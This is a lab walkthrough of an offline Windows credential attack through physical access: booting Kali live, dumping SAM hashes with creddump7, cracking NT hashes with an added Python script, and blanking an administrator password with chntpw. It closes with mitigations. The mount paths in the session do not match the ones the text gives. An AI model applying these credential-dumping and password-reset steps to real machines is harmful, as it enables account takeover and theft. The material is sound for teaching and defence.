System penetration via physical access

Connecting to the machine from Kali Linux in live mode

From this live system we first find which partition holds the Windows installation:

┌──(kali㉿kali)-[/]
└─$ sudo fdisk -l
Disk /dev/sda: 80 GiB, 85899345920 bytes, 167772160 sectors
Disk model: VBOX HARDDISK
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6036ac36

Device     Boot   Start       End   Sectors  Size Id Type
/dev/sda1  *       2048   1187839   1185792  579M  7 HPFS/NTFS/exFAT
/dev/sda2       1187840 167770111 166582272 79.4G  7 HPFS/NTFS/exFAT

Disk /dev/loop0: 3.34 GiB, 3588648960 bytes, 7009080 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

We can see that sda2 holds the data (the bootable 579 MiB sda1 is the System Reserved boot partition). After mounting it (here under /opt/windob), creddump7 extracts the users and their password hashes from the SYSTEM and SAM hives; SYSTEM is needed because it contains the boot key that decrypts the SAM:

┌──(kali㉿kali)-[/usr/share/creddump7]
└─$ python3 pwdump.py /opt/windob/Windows/System32/config/SYSTEM /opt/windob/Windows/System32/config/SAM
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:ac221aa41bb3fe71c9830cfff5e3c8e2:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e4a0c4e1a1090919f2a22e9435fe7bce:::
user:1001:aad3b435b51404eeaad3b435b51404ee:36aa83bdcab3c9fdaf321ca42a31c3fc:::
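To make sense of a dump like the one above without reaching for hashcat, here is an added example (my own code, not part of the original write-up and not creddump7's code) that re-implements the NT hash (MD4 over the UTF-16LE password, no salt), parses pwdump-format lines, flags accounts whose NT hash is the empty-password digest or whose LM field is populated, and runs a small dictionary check. The dump embedded in it is the page's own output plus one constructed account, labuser, whose hash is the NT hash of "password"; the wordlist is a constructed stand-in for a real one. MD4 is implemented by hand because hashlib.new("md4") is absent on many OpenSSL 3 builds.

```python
"""Interpret a pwdump-format SAM dump offline (added example, not creddump7 code).

The NT hash is MD4(UTF-16LE(password)); MD4 is re-implemented below since
hashlib's md4 is often missing with OpenSSL 3.  SAMPLE_DUMP holds the page's
five lines plus a constructed "labuser" whose NT hash is that of "password".
"""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4(""): account has no password

# First five lines are from the page; the labuser line is constructed for the demo.
SAMPLE_DUMP = """\
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:ac221aa41bb3fe71c9830cfff5e3c8e2:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e4a0c4e1a1090919f2a22e9435fe7bce:::
user:1001:aad3b435b51404eeaad3b435b51404ee:36aa83bdcab3c9fdaf321ca42a31c3fc:::
labuser:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
WORDLIST = ["123456", "admin", "password", "Password1"]  # constructed stand-in for rockyou.txt


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: three rounds of 16 steps over each 64-byte block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # message bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (boolean function, additive constant, word order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # One step updates one register; rotating the tuple walks the a,d,c,b cycle.
                a = _rotl((a + func(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash exactly as stored in the SAM: MD4 of the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Split 'name:rid:lmhash:nthash:::' lines into dicts; skip anything else."""
    accounts = []
    for line in text.splitlines():
        if line.count(":") < 3:
            continue
        name, rid, lm, nt = line.split(":")[:4]
        accounts.append({"name": name, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def audit(text: str, wordlist: list) -> dict:
    """Classify each account as blank, cracked by the wordlist, or not in wordlist.

    NT hashes are unsalted, so the wordlist is hashed once and every account
    is resolved with a single dictionary lookup.
    """
    rainbow = {nt_hash(word): word for word in wordlist}
    report = {}
    for acct in parse_pwdump(text):
        findings = []
        if acct["nt"] == EMPTY_NT:
            findings.append("blank password")
        elif acct["nt"] in rainbow:
            findings.append("cracked: " + rainbow[acct["nt"]])
        else:
            findings.append("not in wordlist")
        if acct["lm"] != EMPTY_LM:
            findings.append("LM hash stored")  # pre-Vista weakness, crackable in minutes
        report[acct["name"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_DUMP, WORDLIST).items():
        print(f"{name:20s} {', '.join(findings)}")
```

Running it prints Invité and DefaultAccount as blank and labuser as cracked, while the page's real hashes stay "not in wordlist"; for those, feed the dump to hashcat -m 1000 with a proper wordlist, or skip cracking altogether and use the NT hash directly in a pass-the-hash attack, since the hash itself is the credential.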

In this dump, aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (LM storage is disabled, as on every supported Windows release), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Invité and DefaultAccount have no password at all (both are disabled by default anyway). The other NT hashes are unsalted MD4 digests: they can be cracked offline (hashcat -m 1000) or replayed as-is in a pass-the-hash attack. If all we want is to log in, the alternative is chntpw, which edits the SAM hive in place and blanks the password outright; this requires the partition to be mounted read-write, which is what the session below does.

┌──(kali㉿kali)-[/etc/opt]
└─$ sudo mkdir yolo

┌──(kali㉿kali)-[/etc/opt]
└─$ sudo mount -t ntfs-3g /dev/sda2 /etc/opt

┌──(kali㉿kali)-[/etc/opt]
└─$ cd /etc/opt

┌──(kali㉿kali)-[/etc/opt]
└─$ ls
'$Recycle.Bin'  '$SysReset'  'Documents and Settings'   pagefile.sys   PerfLogs   ProgramData  'Program Files'  'Program Files (x86)'   Recovery   swapfile.sys  'System Volume Information'   Users   Windows

┌──(kali㉿kali)-[/etc/opt]
└─$ cd Windows/System32/config

┌──(kali㉿kali)-[/etc/opt/Windows/System32/config]
└─$ sudo chntpw -i SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\\SystemRoot\\System32\\Config\\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 686c <lh>
File size 65536 [10000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 329/35936 blocks/bytes, unused: 24/21152 blocks/bytes.

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <SAM>

  1 - Edit user data and passwords
  2 - List groups
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1

===== chntpw Edit User Info & Passwords ====

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrateur                 | ADMIN  | dis/lock |
| 01f7 | DefaultAccount                 |        | dis/lock |
| 01f5 | Invité                         |        |          |
| 03e9 | user                           | ADMIN  |          |
| 01f8 | WDAGUtilityAccount             |        | dis/lock |

Please enter user number (RID) or 0 to exit: [3e9] 03e9
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12
** No NT MD4 hash found. This user probably has a BLANK password!
** No LANMAN hash found either. Try login with no password!

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12
** No NT MD4 hash found. This user probably has a BLANK password!
** No LANMAN hash found either. Try login with no password!

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > q

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <SAM>

  1 - Edit user data and passwords
  2 - List groups
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] -> q

Hives that have changed:
 #  Name
 0  <SAM>
Write hive files? (y/n) [n] : y
 0  <SAM> - OK

After rebooting the Windows machine, the user account logs in with no password and, being a member of Administrateurs, gives full control of the system. Two practical caveats: ntfs-3g refuses a read-write mount when Windows was hibernated or shut down with fast startup enabled (shut Windows down fully first, or mount with the remove_hiberfile option, which discards the saved state), and blanking a password offline makes that user's DPAPI-protected secrets (EFS files, saved credentials, browser passwords) unrecoverable, since their master key is derived from the old password. The whole attack depends on an unencrypted disk and a machine that boots from external media; full-disk encryption (BitLocker with TPM+PIN) and a firmware password with a locked boot order are what defeat it.
